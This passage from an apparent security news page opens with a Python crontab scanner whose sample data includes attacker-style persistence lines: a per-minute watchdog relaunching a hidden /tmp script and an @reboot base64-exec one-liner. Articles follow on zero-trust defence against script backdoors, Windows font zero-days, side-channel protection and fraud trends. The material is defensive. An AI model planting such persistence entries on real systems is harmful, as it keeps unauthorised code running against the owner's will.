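* * * * * pgrep -f /tmp/.cache/sync.py >/dev/null || nohup python3 /tmp/.cache/sync.py &
@reboot python3 -c "import base64;exec(base64.b64decode('aW1wb3J0IG9z'))"
"""

INTERPRETERS = {"python", "python2", "python3", "perl", "sh", "bash"}
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")  # writable by unprivileged users
WATCHDOGS = {"pgrep", "pidof"}

def parse_crontab(text):
    """Yield (schedule, command) pairs; skip comments, blank lines and VAR=value settings."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                       # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:                                          # five time fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command.strip()

def _base(token):
    return token.rsplit("/", 1)[-1]

def assess_entry(schedule, command):
    """Reasons this entry looks like script persistence; an empty list means nothing stood out."""
    try:
        toks = shlex.split(command)
    except ValueError:
        return ["command line does not tokenize (unbalanced quotes)"]
    reasons = []
    interp_positions = [i for i, t in enumerate(toks) if _base(t) in INTERPRETERS]
    for i in interp_positions:
        args = toks[i + 1:]
        if "-c" in args:
            code = args[args.index("-c") + 1] if args.index("-c") + 1 < len(args) else ""
            hint = " with base64/exec" if re.search(r"b64decode|exec\(", code) else ""
            reasons.append("inline code passed via -c" + hint)
        for a in args:
            if a.startswith(UNTRUSTED_DIRS) or re.search(r"/\.[^/]", a):
                reasons.append(f"script in user-writable or hidden path: {a}")
                break
    if "||" in toks and any(_base(t) in WATCHDOGS for t in toks):
        reasons.append("watchdog: relaunches the script whenever it is not running")
    if interp_positions and schedule == "@reboot":
        reasons.append("interpreter launched at every boot")
    if interp_positions and schedule == "* * * * *":
        reasons.append("interpreter launched every minute")
    return reasons

def suspicious_entries(text):
    """[(schedule, command, reasons)] for every entry with at least one reason."""
    found = []
    for schedule, command in parse_crontab(text):
        reasons = assess_entry(schedule, command)
        if reasons:
            found.append((schedule, command, reasons))
    return found

def entries_relaunching(text, script_path):
    """Cron entries that would start script_path again; remove these BEFORE killing the process."""
    return [cmd for _, cmd in parse_crontab(text) if script_path in cmd]

if __name__ == "__main__":
    for schedule, command, reasons in suspicious_entries(SAMPLE_CRONTAB):
        print(f"{schedule:12s} {command}\n    - " + "\n    - ".join(reasons))
    print("remove before kill:", entries_relaunching(SAMPLE_CRONTAB, "/tmp/.cache/sync.py"))
```

The containment order follows from the watchdog entry: edit the crontab first (for example `crontab -l | grep -vF /tmp/.cache/sync.py | crontab -`), then kill the process, then look beyond the user's crontab (/etc/crontab, /etc/cron.d, systemd timers, shell profiles), since a script that knows one persistence trick usually knows several.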

Fighting back against Python backdoors

Scripting attacks often bypass traditional perimeter and EDR defenses. Firewalls, for example, use approved network addresses to decide whether traffic is “safe,” but they cannot verify what is actually communicating at either end, so scripts can easily piggyback on approved firewall rules. As for EDR, traffic from malicious scripts is very similar to that produced by common admin tools, so there is no clear signature for EDR defenses to detect.

The most efficient way to protect against scripting attacks is to adopt an identity-based zero trust approach. In a software identity-based approach, policies are not based on network addresses but on a unique identity for each workload. These identities are derived from dozens of immutable properties of the device, software or script, such as a SHA-256 hash of the binary, the UUID of the BIOS or a cryptographic hash of a script.

Any approach that’s based on network addresses cannot adequately protect the environment. Network addresses change frequently, especially in autoscaling environments such as the cloud or containers, and as mentioned earlier, attackers can piggyback on approved policies to move laterally.

With a software and machine identity-based approach, IT can create policies that explicitly state which devices, software and scripts are allowed to communicate with one another — all other traffic is blocked by default. As a result, malicious scripts would be automatically blocked from establishing backdoors, deploying malware or communicating with sensitive assets.
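The identity-based, default-deny policy described above, as an added example written for this page (not a product API or the article's own code): a Python model in which a workload's identity is the SHA-256 hash of the exact script that runs, bound to the host's UUID, and a policy table allows specific (source identity, destination identity, port) triples with everything else denied. It is run side by side with an address-based rule table on the same scenarios, including the piggybacking and address-churn cases the text raises. The host UUIDs, scripts and addresses are constructed; the backdoor script is a harmless stand-in string.

```python
import hashlib

def script_identity(source):
    """Identity of a piece of code: a hash of what actually runs, not of where it runs from."""
    return "sha256:" + hashlib.sha256(source.encode("utf-8")).hexdigest()

def workload_identity(host_uuid, source):
    """Constructed scheme: bind the script hash to an immutable host property (BIOS UUID)."""
    return f"{host_uuid}/{script_identity(source)}"

class AddressPolicy:
    """Classic firewall rule: allow (src_ip, dst_ip, port). Anything running on an allowed host passes."""
    def __init__(self):
        self.rules = set()
    def allow(self, src_ip, dst_ip, port):
        self.rules.add((src_ip, dst_ip, port))
    def permits(self, src_ip, dst_ip, port):
        return (src_ip, dst_ip, port) in self.rules

class IdentityPolicy:
    """Zero-trust rule: allow (src_identity, dst_identity, port); everything else is denied by default."""
    def __init__(self):
        self.rules = set()
    def allow(self, src_id, dst_id, port):
        self.rules.add((src_id, dst_id, port))
    def permits(self, src_id, dst_id, port):
        return (src_id, dst_id, port) in self.rules

# Constructed hosts, scripts and addresses (placeholders, not real systems).
HOST_A = "4c4c4544-0031-3710-8052-b4c04f503233"   # admin jump host BIOS UUID
HOST_B = "b2f1e6a0-7c1d-4d7e-9a55-3f2c0d9e1b44"   # unapproved workstation BIOS UUID
DB_ID = "db-primary/" + script_identity("constructed stand-in for the database server binary")

APPROVED_SCRIPT = "import psycopg2\nconn = psycopg2.connect('dbname=metrics')\nprint(conn.status)\n"
TROJANIZED_SCRIPT = APPROVED_SCRIPT + "import socket  # one appended line changes the hash\n"
BACKDOOR_SCRIPT = "# constructed stand-in for an attacker's Python backdoor\nimport socket\n"

def build_policies():
    addr = AddressPolicy()
    addr.allow("10.0.0.5", "10.0.0.20", 5432)          # the jump host's address may reach the database
    ident = IdentityPolicy()
    ident.allow(workload_identity(HOST_A, APPROVED_SCRIPT), DB_ID, 5432)  # only this script on this host
    return addr, ident

def evaluate(host_uuid, src_ip, script):
    """Verdict of each policy for one connection attempt from a script to the database."""
    addr, ident = build_policies()
    return {
        "address_policy": addr.permits(src_ip, "10.0.0.20", 5432),
        "identity_policy": ident.permits(workload_identity(host_uuid, script), DB_ID, 5432),
    }

SCENARIOS = {
    "approved script on jump host": (HOST_A, "10.0.0.5", APPROVED_SCRIPT),
    "backdoor on jump host (same IP)": (HOST_A, "10.0.0.5", BACKDOOR_SCRIPT),      # piggybacks on the IP rule
    "trojanized copy on jump host": (HOST_A, "10.0.0.5", TROJANIZED_SCRIPT),        # one line changed
    "approved script on unapproved host": (HOST_B, "10.0.0.77", APPROVED_SCRIPT),
    "approved script after jump host re-IPs": (HOST_A, "10.0.0.99", APPROVED_SCRIPT),  # address churn
}

def run_scenarios():
    return {name: evaluate(*args) for name, args in SCENARIOS.items()}

if __name__ == "__main__":
    for name, verdict in run_scenarios().items():
        print(f"{name:42s} address={verdict['address_policy']!s:5} identity={verdict['identity_policy']}")
```

The two policies disagree on exactly the cases the text describes: the address rule lets a backdoor on the approved host through and breaks as soon as that host changes address, while the identity rule denies any code whose hash was never admitted and keeps working after the move. The model shows only the policy logic; in a deployment the hash and host UUID have to be measured by something the attacker on that host cannot alter, and every legitimate change to a script means approving its new hash.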

Scripts are rapidly becoming the primary vector for bad actors to compromise enterprise networks. By establishing and enforcing zero trust based on identity, enterprises can shut them down before they have a chance to establish themselves in the environment.

Windows users under attack via two new RCE zero-days

Attackers are exploiting two new zero-days in the Windows Adobe Type Manager Library to achieve remote code execution on targeted Windows systems, Microsoft warns.

The attacks are limited and targeted, the company noted, and provided workarounds to help reduce customer risk until a fix is developed and released.

More about the new Windows zero-days

According to the security advisory published on Monday, the vulnerabilities arise from the affected library’s improper handling of a specially-crafted multi-master font – Adobe Type 1 PostScript format.

“There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane,” the company shared, and said that the Outlook Preview Pane is not an attack vector for this vulnerability.

The flaws affect:

  • Windows 10
  • Windows 8.1
  • Windows 7
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016
  • Windows Server 2019
  • Windows Server, version 1803
  • Windows Server, version 1903
  • Windows Server, version 1909

“For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities,” Microsoft added.

Mitigations and workarounds

Enhanced Security Configuration, the restricted Internet Explorer mode that is on by default on Windows Server, does not mitigate the vulnerabilities.

Offered workarounds include disabling the Preview Pane and Details Pane in Windows Explorer, disabling the WebClient service, and renaming the ATMFD.DLL file. Microsoft explains how to do all that and the impacts of these workarounds in the security advisory.

The company did not offer more details about the attacks, nor did it say when the security updates will be released, but noted that Windows 7, Windows Server 2008 and Windows Server 2008 R2 users will need an Extended Security Updates (ESU) license to receive them.

Mixed-signal circuits can stop side-channel attacks against IoT devices

Purdue University innovators have unveiled technology that is 100 times more resilient to electromagnetic and power attacks, to stop side-channel attacks against IoT devices.

Securing IoT devices against side-channel attacks

Security of embedded devices is essential in today’s internet-connected world. Security is typically guaranteed mathematically: a small secret key is used to encrypt private messages.

When these computationally secure encryption algorithms are implemented in physical hardware, they leak critical side-channel information in the form of power consumption or electromagnetic radiation. Now, Purdue University innovators have developed technology to kill the problem at the source – tackling physical-layer vulnerabilities with physical-layer solutions.

Recent attacks have shown that such side-channel attacks can happen in just a few minutes from a short distance away. Recently, these attacks were used in the counterfeiting of e-cigarette batteries by stealing the secret encryption keys from authentic batteries to gain market share.

“This leakage is inevitable as it is created due to the accelerating and decelerating electrons, which are at the core of today’s digital circuits performing the encryption operations,” said Debayan Das, a Ph.D. student in Purdue’s College of Engineering.

“Such attacks are becoming a significant threat to resource-constrained edge devices that use symmetric key encryption with a relatively static secret key like smart cards. Our technology has been shown to be 100 times more resilient to these attacks against Internet of Things devices than current solutions.”

The team developed technology to use mixed-signal circuits to embed the crypto core within a signature attenuation hardware with lower-level metal routing, such that the critical signature is suppressed even before it reaches the higher-level metal layers and the supply pin. Das said this drastically reduces electromagnetic and power information leakage.

“Our technique basically makes an attack impractical in many situations,” Das said. “Our protection mechanism is generic enough that it can be applied to any cryptographic engine to improve side-channel security.”

The rise of human-driven fraud attacks

There has been a major spike in human-driven attacks – which rose 90% compared to six months previously, according to Arkose Labs.

Changing attack patterns were felt across geographies and industries, at a time of the year when digital commerce was at its peak.

In Q4 of 2019, advanced, multi-step attacks that attempt to evade fraud defenses with a blend of automated and human-driven activity were detected. Automated fraud attacks, which grew by 25%, are becoming increasingly complex as fraudsters get better at mimicking trusted customer behavior.

While automated attacks are still prevalent across most industries, the notable rise in human-driven attacks is attributed to fraudsters leveraging what Arkose Labs defines as “sweatshop-like workers” to enhance attacks.

Sweatshop-driven attack levels increased during high online traffic periods as fraudsters attempted to blend in with legitimate traffic, with peak attack levels 50% higher than seen in Q2 of 2019.

The key countries where human-driven attacks originated from shifted in Q4, showing fraudsters tapping into human farms across the globe to keep costs low and profits high. Sweatshop-driven attacks from Venezuela, Vietnam, Thailand, India and Ukraine grew, while attacks from the Philippines, Russia and Ukraine almost tripled compared to Q2 2019.

“Notable shifts are occurring in today’s threat landscape, with fraudsters no longer looking to make a quick buck and instead opting to play the long game, implementing multi-step attacks that don’t initially reveal their fraudulent intent,” said Kevin Gosschalk, CEO of Arkose Labs.

“Fraudsters are increasingly augmenting their attacks by outsourcing activity to human sweatshop resources, causing a surge in fraud within certain industries such as online gaming and social media.”

Attacks on social media platforms are increasingly human-driven

Due to the volume of rich personal data on social media platforms and high user activity levels, social applications are lucrative targets for fraudsters looking to scrape content, write fake reviews, steal information or disseminate spam and malicious content.

In Q4 of 2019, there was a sharp increase in attack volumes for both social media account registrations and logins. In fact, two in five login attempts and one in five new account registrations were fraudulent, one of the highest attack rates of any industry.

The share of human-driven attacks in the mix also rose, with more than 50% of social media login attacks being human-driven.

“The elevated rate of human-driven login attacks is supported by organized sweatshops, with fraudsters attempting to hack into legitimate users’ accounts to manipulate or steal credentials and disseminate spam,” explained Vanita Pandey, VP of Marketing and Strategy at Arkose Labs.

“With two in every five social media logins being an attack and more than half of those attacks being human-driven, it’s clear that fraudsters are targeting this customer touchpoint with hopes of downstream monetization.”

Online gaming has emerged as a lucrative channel for fraudsters

As millions increasingly engage in online gaming, the industry has emerged as a prime target for fraudsters across the globe.

Gaming fraud in Q4 of 2019 demonstrated highly sophisticated attack patterns in comparison to other industries, with fraudsters leveraging gaming applications to use stolen payment methods, steal in-game assets, abuse the auction houses and disseminate malicious content.

Fraudsters are using bots to build online gaming account profiles and sell accounts with higher levels and assets, while also targeting online currencies used within select games. Overall, the report found that online gaming attack rates grew 25% last quarter, with most of the growth coming from human-driven attacks on new account registrations and logins.

Combating cybercrime requires a zero tolerance approach

Rising human-driven attack rates demonstrate that fraudsters are willing to be creative and invest more in their attacks, often laying the groundwork months in advance using lower cost, automated attacks.

As long as there is money to be made in fraud and businesses continue to tolerate attacks, fraudsters will continue to identify the most effective attack methods to achieve optimal ROI.

“Ultimately, the only sustainable approach to combating cybercrime is adopting a zero tolerance approach that undermines the economic incentives behind fraud. Tolerating fraud as ‘the cost of doing business’ exacerbates the problem long-term,” said Gosschalk.

“To identify the subtle, tell-tale signs that predict downstream fraud, organizations must prioritize in-depth profiling of activity across all customer touchpoints. By combining digital intelligence with targeted friction, large-scale attacks will quickly become unsustainable for fraudsters.”